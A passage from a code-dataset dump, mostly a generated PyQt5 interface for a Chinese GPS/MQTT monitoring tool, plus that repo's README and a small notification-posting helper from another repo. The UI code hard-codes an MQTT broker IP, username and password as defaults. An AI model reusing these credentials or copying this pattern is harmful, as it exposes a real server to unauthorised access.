self.label_18.setObjectName(\"label_18\")\r\n self.verticalLayout_3.addWidget(self.label_18)\r\n self.label_19 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_19.setFont(font)\r\n self.label_19.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_19.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_19.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_19.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_19.setObjectName(\"label_19\")\r\n self.verticalLayout_3.addWidget(self.label_19)\r\n self.label_20 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_20.setFont(font)\r\n self.label_20.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_20.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_20.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_20.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_20.setObjectName(\"label_20\")\r\n self.verticalLayout_3.addWidget(self.label_20)\r\n self.horizontalLayout.addLayout(self.verticalLayout_3)\r\n self.verticalLayout_4 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_4.setSpacing(6)\r\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\r\n spacerItem4 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem4)\r\n self.label_yaw = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_yaw.setFont(font)\r\n self.label_yaw.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_yaw.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_yaw.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw.setObjectName(\"label_yaw\")\r\n self.verticalLayout_4.addWidget(self.label_yaw)\r\n self.label_yaw_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_yaw_3.setFont(font)\r\n self.label_yaw_3.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_yaw_3.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_yaw_3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw_3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw_3.setObjectName(\"label_yaw_3\")\r\n self.verticalLayout_4.addWidget(self.label_yaw_3)\r\n spacerItem5 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem5)\r\n self.label_roll = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_roll.setFont(font)\r\n self.label_roll.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_roll.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_roll.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll.setObjectName(\"label_roll\")\r\n self.verticalLayout_4.addWidget(self.label_roll)\r\n self.label_roll_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_roll_3.setFont(font)\r\n self.label_roll_3.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_roll_3.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_roll_3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll_3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll_3.setObjectName(\"label_roll_3\")\r\n self.verticalLayout_4.addWidget(self.label_roll_3)\r\n spacerItem6 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem6)\r\n self.label_pitch = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_pitch.setFont(font)\r\n self.label_pitch.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_pitch.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_pitch.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch.setObjectName(\"label_pitch\")\r\n self.verticalLayout_4.addWidget(self.label_pitch)\r\n self.label_pitch_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(11)\r\n self.label_pitch_3.setFont(font)\r\n self.label_pitch_3.setStyleSheet(\"color: rgb(109, 0, 82);\")\r\n self.label_pitch_3.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_pitch_3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch_3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch_3.setObjectName(\"label_pitch_3\")\r\n self.verticalLayout_4.addWidget(self.label_pitch_3)\r\n spacerItem7 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_4.addItem(spacerItem7)\r\n self.horizontalLayout.addLayout(self.verticalLayout_4)\r\n self.verticalLayout_11 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_11.setSpacing(6)\r\n self.verticalLayout_11.setObjectName(\"verticalLayout_11\")\r\n spacerItem8 = QtWidgets.QSpacerItem(20, 33, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem8)\r\n self.label_yaw_v = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_yaw_v.setFont(font)\r\n self.label_yaw_v.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_yaw_v.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_yaw_v.setText(\"\")\r\n self.label_yaw_v.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw_v.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw_v.setObjectName(\"label_yaw_v\")\r\n self.verticalLayout_11.addWidget(self.label_yaw_v)\r\n self.label_yaw_dot = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_yaw_dot.setFont(font)\r\n self.label_yaw_dot.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_yaw_dot.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_yaw_dot.setText(\"\")\r\n self.label_yaw_dot.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_yaw_dot.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_yaw_dot.setObjectName(\"label_yaw_dot\")\r\n self.verticalLayout_11.addWidget(self.label_yaw_dot)\r\n spacerItem9 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem9)\r\n self.label_roll_v = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_roll_v.setFont(font)\r\n self.label_roll_v.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_roll_v.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_roll_v.setText(\"\")\r\n self.label_roll_v.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll_v.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll_v.setObjectName(\"label_roll_v\")\r\n self.verticalLayout_11.addWidget(self.label_roll_v)\r\n self.label_roll_dot = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_roll_dot.setFont(font)\r\n self.label_roll_dot.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_roll_dot.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_roll_dot.setText(\"\")\r\n self.label_roll_dot.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_roll_dot.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_roll_dot.setObjectName(\"label_roll_dot\")\r\n self.verticalLayout_11.addWidget(self.label_roll_dot)\r\n spacerItem10 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem10)\r\n self.label_pitch_v = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_pitch_v.setFont(font)\r\n self.label_pitch_v.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_pitch_v.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_pitch_v.setText(\"\")\r\n self.label_pitch_v.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch_v.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch_v.setObjectName(\"label_pitch_v\")\r\n self.verticalLayout_11.addWidget(self.label_pitch_v)\r\n self.label_pitch_dot = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_pitch_dot.setFont(font)\r\n self.label_pitch_dot.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_pitch_dot.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_pitch_dot.setText(\"\")\r\n self.label_pitch_dot.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_pitch_dot.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_pitch_dot.setObjectName(\"label_pitch_dot\")\r\n self.verticalLayout_11.addWidget(self.label_pitch_dot)\r\n spacerItem11 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_11.addItem(spacerItem11)\r\n self.horizontalLayout.addLayout(self.verticalLayout_11)\r\n self.horizontalLayout.setStretch(2, 1)\r\n self.label_21 = QtWidgets.QLabel(self.widget)\r\n self.label_21.setGeometry(QtCore.QRect(10, 10, 361, 20))\r\n font = QtGui.QFont()\r\n font.setFamily(\"隶书\")\r\n font.setPointSize(14)\r\n self.label_21.setFont(font)\r\n self.label_21.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_21.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_21.setObjectName(\"label_21\")\r\n self.widget_2 = QtWidgets.QWidget(self.tab_4)\r\n self.widget_2.setGeometry(QtCore.QRect(640, 60, 380, 261))\r\n self.widget_2.setStyleSheet(\"background-color: rgb(245, 255, 180);\")\r\n self.widget_2.setObjectName(\"widget_2\")\r\n self.label_26 = QtWidgets.QLabel(self.widget_2)\r\n self.label_26.setGeometry(QtCore.QRect(10, 10, 361, 20))\r\n font = QtGui.QFont()\r\n font.setFamily(\"隶书\")\r\n font.setPointSize(14)\r\n self.label_26.setFont(font)\r\n self.label_26.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_26.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_26.setObjectName(\"label_26\")\r\n self.horizontalLayoutWidget_10 = QtWidgets.QWidget(self.widget_2)\r\n self.horizontalLayoutWidget_10.setGeometry(QtCore.QRect(10, 40, 361, 221))\r\n self.horizontalLayoutWidget_10.setObjectName(\"horizontalLayoutWidget_10\")\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_10)\r\n self.horizontalLayout_6.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_6.setSpacing(6)\r\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\r\n self.verticalLayout_7 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_7.setSpacing(6)\r\n self.verticalLayout_7.setObjectName(\"verticalLayout_7\")\r\n self.label_27 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_27.setFont(font)\r\n self.label_27.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_27.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_27.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_27.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_27.setObjectName(\"label_27\")\r\n self.verticalLayout_7.addWidget(self.label_27)\r\n self.label_28 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_28.setFont(font)\r\n self.label_28.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_28.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_28.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_28.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_28.setObjectName(\"label_28\")\r\n self.verticalLayout_7.addWidget(self.label_28)\r\n self.label_29 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_29.setEnabled(True)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_29.setFont(font)\r\n self.label_29.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_29.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_29.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_29.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_29.setObjectName(\"label_29\")\r\n self.verticalLayout_7.addWidget(self.label_29)\r\n self.label_30 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_30.setFont(font)\r\n self.label_30.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_30.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_30.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_30.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_30.setObjectName(\"label_30\")\r\n self.verticalLayout_7.addWidget(self.label_30)\r\n self.label_31 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_31.setFont(font)\r\n self.label_31.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_31.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_31.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_31.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_31.setObjectName(\"label_31\")\r\n self.verticalLayout_7.addWidget(self.label_31)\r\n self.horizontalLayout_6.addLayout(self.verticalLayout_7)\r\n self.verticalLayout_8 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_8.setSpacing(6)\r\n self.verticalLayout_8.setObjectName(\"verticalLayout_8\")\r\n spacerItem12 = QtWidgets.QSpacerItem(20, 33, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem12)\r\n self.label_motor1 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor1.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor1.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor1.setText(\"\")\r\n self.label_motor1.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor1.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor1.setObjectName(\"label_motor1\")\r\n self.verticalLayout_8.addWidget(self.label_motor1)\r\n spacerItem13 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem13)\r\n self.label_motor2 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor2.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor2.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor2.setText(\"\")\r\n self.label_motor2.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor2.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor2.setObjectName(\"label_motor2\")\r\n self.verticalLayout_8.addWidget(self.label_motor2)\r\n spacerItem14 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem14)\r\n self.label_motor3 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor3.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor3.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor3.setText(\"\")\r\n self.label_motor3.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor3.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor3.setObjectName(\"label_motor3\")\r\n self.verticalLayout_8.addWidget(self.label_motor3)\r\n spacerItem15 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem15)\r\n self.label_motor4 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor4.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor4.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor4.setText(\"\")\r\n self.label_motor4.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor4.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor4.setObjectName(\"label_motor4\")\r\n self.verticalLayout_8.addWidget(self.label_motor4)\r\n spacerItem16 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem16)\r\n self.label_motor5 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\r\n self.label_motor5.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_motor5.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_motor5.setText(\"\")\r\n self.label_motor5.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_motor5.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_motor5.setObjectName(\"label_motor5\")\r\n self.verticalLayout_8.addWidget(self.label_motor5)\r\n spacerItem17 = QtWidgets.QSpacerItem(20, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout_8.addItem(spacerItem17)\r\n self.horizontalLayout_6.addLayout(self.verticalLayout_8)\r\n self.horizontalLayout_6.setStretch(1, 1)\r\n self.tabWidget.addTab(self.tab_4, \"\")\r\n self.tab_2 = QtWidgets.QWidget()\r\n self.tab_2.setObjectName(\"tab_2\")\r\n self.tabWidget.addTab(self.tab_2, \"\")\r\n MainWindow.setCentralWidget(self.centralWidget)\r\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\r\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 1120, 23))\r\n self.menuBar.setObjectName(\"menuBar\")\r\n MainWindow.setMenuBar(self.menuBar)\r\n\r\n self.retranslateUi(MainWindow)\r\n self.tabWidget.setCurrentIndex(1)\r\n self.pushButton_start.clicked.connect(self.Start)\r\n self.pushButton_stop.clicked.connect(self.Stop)\r\n self.pushButton_reset.clicked.connect(self.Reset)\r\n self.pushButton_clear.clicked.connect(self.Clear)\r\n self.pushButton_submit.clicked.connect(self.Subs)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"GPS Map\"))\r\n self.label_11.setText(_translate(\"MainWindow\", \"Topic\"))\r\n self.lineEdit_topic.setText(_translate(\"MainWindow\", \"/CC3200@SHIP/2/SHIPDATA/SENSORDATA\"))\r\n self.lineEdit_topic.setPlaceholderText(_translate(\"MainWindow\", \"订阅主题\"))\r\n self.pushButton_submit.setText(_translate(\"MainWindow\", \"Submit\"))\r\n self.label_12.setText(_translate(\"MainWindow\", \"Host\"))\r\n self.lineEdit_host.setText(_translate(\"MainWindow\", \"139.199.208.33\"))\r\n self.lineEdit_host.setPlaceholderText(_translate(\"MainWindow\", \"服务器IP\"))\r\n self.label_13.setText(_translate(\"MainWindow\", \"Port\"))\r\n self.lineEdit_port.setText(_translate(\"MainWindow\", \"1883\"))\r\n self.lineEdit_port.setPlaceholderText(_translate(\"MainWindow\", \"端口\"))\r\n self.label_14.setText(_translate(\"MainWindow\", \"Username\"))\r\n self.lineEdit_username.setText(_translate(\"MainWindow\", \"cehang\"))\r\n self.lineEdit_username.setPlaceholderText(_translate(\"MainWindow\", \"用户名\"))\r\n self.label_15.setText(_translate(\"MainWindow\", \"Password\"))\r\n self.lineEdit_password.setText(_translate(\"MainWindow\", \"cehang001\"))\r\n self.lineEdit_password.setPlaceholderText(_translate(\"MainWindow\", \"密码\"))\r\n self.label_16.setText(_translate(\"MainWindow\", \"CliendID\"))\r\n self.lineEdit_clientid.setText(_translate(\"MainWindow\", \"SXF_Python_Map\"))\r\n self.lineEdit_clientid.setPlaceholderText(_translate(\"MainWindow\", \"连接ID\"))\r\n self.label_17.setText(_translate(\"MainWindow\", \"HeartBeat\"))\r\n self.lineEdit_heartbeat.setText(_translate(\"MainWindow\", \"60\"))\r\n self.lineEdit_heartbeat.setPlaceholderText(_translate(\"MainWindow\", \"心跳\"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate(\"MainWindow\", \" 连接 \"))\r\n self.label_10.setText(_translate(\"MainWindow\", \"Receive Topic\"))\r\n self.label_img.setText(_translate(\"MainWindow\", \"GPS Map Here\"))\r\n self.label.setText(_translate(\"MainWindow\", \"状态\"))\r\n self.label_2.setText(_translate(\"MainWindow\", \"模式\"))\r\n self.label_3.setText(_translate(\"MainWindow\", \"时间\"))\r\n self.label_4.setText(_translate(\"MainWindow\", \"纬度\"))\r\n self.label_5.setText(_translate(\"MainWindow\", \"经度\"))\r\n self.label_6.setText(_translate(\"MainWindow\", \"速率\"))\r\n self.label_7.setText(_translate(\"MainWindow\", \"航向\"))\r\n self.label_8.setText(_translate(\"MainWindow\", \"磁偏\"))\r\n self.label_9.setText(_translate(\"MainWindow\", \"偏向\"))\r\n self.label_status.setText(_translate(\"MainWindow\", \"A有效;V无效\"))\r\n self.label_mode.setText(_translate(\"MainWindow\", \"A自主;D差分;E估算; N无效\"))\r\n self.label_time.setText(_translate(\"MainWindow\", \"年/月/日 时:分:秒\"))\r\n self.label_lat.setText(_translate(\"MainWindow\", \"N北纬;S南纬\"))\r\n self.label_lon.setText(_translate(\"MainWindow\", \"E东经;W西经\"))\r\n self.label_speed.setText(_translate(\"MainWindow\", \"公里/小时\"))\r\n self.label_course.setText(_translate(\"MainWindow\", \"0~359.9°\"))\r\n self.label_declination.setText(_translate(\"MainWindow\", \"0~180.0°\"))\r\n self.label_declination_dir.setText(_translate(\"MainWindow\", \"E东;W西\"))\r\n self.pushButton_reset.setText(_translate(\"MainWindow\", \"Reset\"))\r\n self.pushButton_start.setText(_translate(\"MainWindow\", \"Start\"))\r\n self.pushButton_stop.setText(_translate(\"MainWindow\", \"Stop\"))\r\n self.label_debug.setText(_translate(\"MainWindow\", \"DeBug Here\"))\r\n self.pushButton_clear.setText(_translate(\"MainWindow\", \"Clear\"))\r\n self.label_gpsupdate.setText(_translate(\"MainWindow\", \"定位未更新\"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \" GPS \"))\r\n self.label_18.setText(_translate(\"MainWindow\", \"偏航角(yaw)\"))\r\n self.label_19.setText(_translate(\"MainWindow\", \"滚转角(roll)\"))\r\n self.label_20.setText(_translate(\"MainWindow\", \"俯仰角(pitch)\"))\r\n self.label_yaw.setText(_translate(\"MainWindow\", \"角度\"))\r\n self.label_yaw_3.setText(_translate(\"MainWindow\", \"角加速度\"))\r\n self.label_roll.setText(_translate(\"MainWindow\", \"角度\"))\r\n self.label_roll_3.setText(_translate(\"MainWindow\", \"角加速度\"))\r\n self.label_pitch.setText(_translate(\"MainWindow\", \"角度\"))\r\n self.label_pitch_3.setText(_translate(\"MainWindow\", \"角加速度\"))\r\n self.label_21.setText(_translate(\"MainWindow\", \"MPU6050姿态传感器\"))\r\n self.label_26.setText(_translate(\"MainWindow\", \"A365电机转速\"))\r\n self.label_27.setText(_translate(\"MainWindow\", \"电机1\"))\r\n self.label_28.setText(_translate(\"MainWindow\", \"电机2\"))\r\n self.label_29.setText(_translate(\"MainWindow\", \"电机3\"))\r\n self.label_30.setText(_translate(\"MainWindow\", \"电机4\"))\r\n self.label_31.setText(_translate(\"MainWindow\", \"电机5\"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_4), _translate(\"MainWindow\", \" 传感器 \"))\r\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \" 控制 \"))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7220630645751953,
"alphanum_fraction": 0.7507163286209106,
"avg_line_length": 25.538461685180664,
"blob_id": "123f96d22eb02edfdf8bd224f43e30766dacef81",
"content_id": "763eef64554442e1f565526cfdc749c5b7f88b2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 13,
"path": "/README.md",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
"text": "# GPS_UpperComputer_MQTT \n【毕设内容之一】 \n \nPC上位机,可配置mqtt连接信息、解析GPS数据,并调用百度地图API显示。 \n界面用Qt12绘制,exe由pyinstaller生成。 \n\nexe文件较大,可访问链接获取: https://pan.baidu.com/s/1EU8LWXp1MicvyDC5bGWeAw 提取码: jepv \n若嫌网盘下载太慢,可自行搜索pandownload,可快速下载网盘文件。 \n\n使用时,请补全一下内容(exe文件不需添加,内已使用我的)\n1. USERNAME = \"\"\n2. PASSWORD = \"\"\n3. def gps2baidu(self, longitude, latitude)中的ak\n\n\n\n\n"
}
] | 4 |
bradley101/blackpearl-backend
|
https://github.com/bradley101/blackpearl-backend
|
2498998d1ca018056dfb204ae7edfc927addf326
|
21934246e9d06b84e60af8ad0a527dade9690f62
|
c6227c63e92e0d92c17c7f28a05d2d5e1d52aca8
|
refs/heads/master
| 2023-08-23T20:13:34.799524 | 2021-10-18T19:24:52 | 2021-10-18T19:24:52 | 418,634,036 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.599645733833313,
"alphanum_fraction": 0.6200177073478699,
"avg_line_length": 28.6842098236084,
"blob_id": "db70379f11dda1feb1f36d4d4eef020dc75d4a0a",
"content_id": "f4a496ab09ae489221f262ccf937d64fc16b2368",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1129,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 38,
"path": "/db_helper.py",
"repo_name": "bradley101/blackpearl-backend",
"src_encoding": "UTF-8",
"text": "'''\n Please run\n python -m pip install requests\n before using this\n\n runs on python 2.x\n\n usage:\n Call sendNotification() with the params to save the notification in \n the database and send notification to the devices\n'''\nimport requests, json\n\ndef format_to_unicode(d):\n return u'{}'.format(d)\n\nftu = format_to_unicode\n\nnotification_server = 'http://localhost:3443'\n\ndef sendNotification(strMsg, strSeverity, strAutoInductId, numTimestamp):\n try:\n r = requests.post('{}/notify'.format(notification_server), json={\n ftu(\"message\"): ftu(strMsg),\n ftu(\"severity\"): ftu(strSeverity),\n ftu(\"timestamp\"): numTimestamp,\n ftu(\"inductId\"): ftu(strAutoInductId)\n })\n if r.status_code == 200:\n print (r.status_code, \"Notification send to devices\")\n else:\n print(r.status_code, r.reason)\n except Exception as e1:\n print (\"Exception occurred - \", e1)\n\nif __name__ == \"__main__\":\n test_notification = [\"Important and Complex msg\", \"1\", \"490\", 565465456]\n sendNotification(*test_notification)\n\n"
},
{
"alpha_fraction": 0.6982758641242981,
"alphanum_fraction": 0.7396551966667175,
"avg_line_length": 23.16666603088379,
"blob_id": "37b856883d6ba21872820e8d2cf91909c6bb31cf",
"content_id": "df06b238074672a0c46901cd1aa3ef61e449fc78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 24,
"path": "/README.md",
